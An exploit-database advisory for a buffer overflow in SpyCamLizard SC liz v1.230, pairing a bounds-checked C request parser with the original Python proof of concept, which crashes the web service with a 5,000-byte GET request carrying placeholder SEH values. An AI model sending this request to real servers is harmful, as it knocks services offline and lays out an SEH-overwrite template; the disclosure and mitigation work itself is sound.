Vendor: SpyCamLizard SC liz
By: Greg Priest
CVSS: 7,8 (HIGH)
CWE: Buffer Overflow, 120 (Buffer Copy without Checking Size of Input)
Product Name: SpyCamLizard SC liz
Affected Version From: v1.230
Affected Version To: v1.230
Patch Exists: YES
Related CWE: N/A
CPE: a:spycamlizard:spycamlizard_sc_liz
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows7 x64 HUN/ENG Enterprise
2017

SpyCamLizard SC liz v1.230 Remote Buffer Overflow ZeroDay

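SpyCamLizard SC liz v1.230 is vulnerable to a remote buffer overflow. An attacker who sends a specially crafted HTTP request containing an overly long string can overflow a buffer and execute arbitrary code on the target system. In the proof of concept below, the long string is the target of a GET request, 5,000 bytes in total (1189 + 4 + 4 + 3803), with placeholder values where the SEH record is overwritten, so as written it only crashes the service. The exploit was tested on Windows 7 x64 HUN/ENG Enterprise.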

Mitigation:

The vendor has released a patch to address this vulnerability.
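
CWE-120 means the request target is copied into a fixed-size buffer before its length is checked. The bounds-checked request-line parser below is an added example, not SpyCamLizard's code or the vendor's patch; the function name, the status codes and the 1024-byte limit are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define MAX_TARGET 1024 /* assumed limit; the product's real buffer size is not on the page */
enum { REQ_OK = 200, REQ_BAD = 400, REQ_URI_TOO_LONG = 414 };

/* Copy the target of "GET <target> HTTP/1.0" into out[out_cap].
 * The length is checked before any byte is copied (the check CWE-120
 * describes as missing). `line` need not be NUL-terminated. */
int parse_request_target(const char *line, size_t line_len,
                         char *out, size_t out_cap)
{
    if (out == NULL || out_cap == 0)
        return REQ_BAD;
    out[0] = '\0';
    if (line == NULL)
        return REQ_BAD;

    const char *sp1 = memchr(line, ' ', line_len);   /* end of method */
    if (sp1 == NULL || sp1 == line)
        return REQ_BAD;

    const char *target = sp1 + 1;
    size_t rest = line_len - (size_t)(target - line);
    const char *sp2 = memchr(target, ' ', rest);      /* end of target */
    if (sp2 == NULL || sp2 == target)
        return REQ_BAD;

    size_t target_len = (size_t)(sp2 - target);
    /* Reject rather than truncate; one byte is reserved for the NUL. */
    if (target_len >= out_cap || target_len > MAX_TARGET)
        return REQ_URI_TOO_LONG;

    memcpy(out, target, target_len);
    out[target_len] = '\0';
    return REQ_OK;
}

int main(void)
{
    /* Constructed input: a request line whose target is 5000 bytes long. */
    static char line[5013];
    char out[MAX_TARGET + 1];
    memcpy(line, "GET ", 4);
    memset(line + 4, 'A', 5000);
    memcpy(line + 5004, " HTTP/1.0", 9);
    printf("%d\n", parse_request_target(line, sizeof line, out, sizeof out));
    return 0;
}
```

Rejecting the oversized target with 414 rather than truncating it keeps the handler from acting on a partial path.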
Exploit-DB raw data:

import socket
import sys

author = '''
  
                ##############################################
                #    Created: ScrR1pTK1dd13                  #
                #    Name: Greg Priest                       #
                #    Mail: ScR1pTK1dd13.slammer@gmail.com    # 
                ##############################################
  
# Exploit Title: SpyCamLizard SC liz v1.230 Remote Buffer Overflow ZeroDay
# Date: 2017.03.22
# Exploit Author: Greg Priest
# Version: SpyCamLizard v1.230
# Tested on: Windows7 x64 HUN/ENG Enterprise
'''

print "SpyCamLizard DoS Exploit running!"
 
host = "192.168.56.1"
port = 80
overflow = "A" * 1189
nextSEH = "BBBB" 
SEH = "CCCC" 
overflow2= "D" * 3803

crash = overflow+nextSEH+SEH+overflow2

httpsocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
httpsocket.connect((host,port))
httpsocket.send("GET " + crash + " HTTP/1.0\r\n\r\n")
httpsocket.close()


print "SpyCamLizard shutted down!"